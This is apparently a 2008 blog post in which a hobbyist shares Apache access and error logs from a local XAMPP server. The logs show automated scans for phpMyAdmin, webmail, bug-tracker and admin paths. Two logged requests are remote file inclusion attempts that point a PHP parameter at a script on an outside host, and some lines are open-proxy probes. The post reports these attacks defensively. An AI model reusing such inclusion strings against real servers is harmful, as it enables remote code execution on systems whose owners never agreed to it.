Saturday 29 November 2008

File System Security - Part I

Hello,

Today I am going to talk about file system security on a webserver Because I got a few attemps to hack my local XAMPP server.

I went to the apache log and I saw something quite interesting:
Access.log:
200.69.177.20 - - [27/Nov/2008:16:19:53 +0000] "GET //user/templates/footer.tpl HTTP/1.1" 404 1122
222.208.183.218 - - [28/Nov/2008:09:51:56 +0000] "GET http://www.nassc.com/pr.php HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /errors.php?error=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /admin/business_inc/saveserver.php?thisdir=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:20:14 +0000] "GET /upload.php HTTP/1.1" 404 1122
216.55.83.12 - - [29/Nov/2008:08:15:55 +0000] "GET /phpmyadmin/main.php HTTP/1.0" 200 3071
222.208.183.218 - - [29/Nov/2008:11:16:36 +0000] "GET http://www.wantsfly.com/prx1.php?hash=047CB197FF160516516CE156005088B4C955CE39C55F HTTP/1.0" 404 1125
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /sqlitemanager/main.php HTTP/1.1" 404 1122
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /SQLiteManager/main.php HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:31 +0000] "GET //README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde2//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde3//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde-3.0.5//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.6//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.7//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.8//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.9//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /mail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /email//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /webmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /newmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mails//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mailz//README HTTP/1.1" 404 1122
81.180.165.131 - - [05/Dec/2008:08:37:43 +0000] "GET /twiki/ HTTP/1.0" 404 1122
81.180.165.131 - - [05/Dec/2008:09:17:52 +0000] "GET /wiki/ HTTP/1.0" 404 1122
218.58.226.13 - - [07/Dec/2008:07:21:54 +0000] "GET /manager/html HTTP/1.1" 404 1122


And error.log:
[Thu Nov 27 16:19:53 2008] [error] [client 200.69.177.20] File does not exist: F:/xampp/htdocs/user
[Fri Nov 28 09:51:57 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/pr.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/errors.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/admin
[Fri Nov 28 18:20:14 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/upload.php' not found or unable to stat
[Sat Nov 29 11:16:36 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/prx1.php' not found or unable to stat
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/sqlitemanager
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/SQLiteManager
[Wed Dec 03 18:44:21 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/PMA
[Wed Dec 03 18:44:25 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/db
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/dbadmin
[Wed Dec 03 18:44:29 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/web
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpmyadmin2
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysqladmin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql-admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] script 'F:/xampp/htdocs/main.php' not found or unable to stat
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.6
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.4
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.1
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.3
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.6
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/myadmin
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-rc1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.2-rc1
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantisbt
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/tracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtrack
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/support
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bug
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugs
[Thu Dec 04 11:25:04 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantis


So I came to the conclusion to not use those files or folders.
Lucky It is a server to upload our own tests and nothing could happen anyway. :)

Whenever I find more security tips I will post them on the blog, I hope it helps to stop hackers.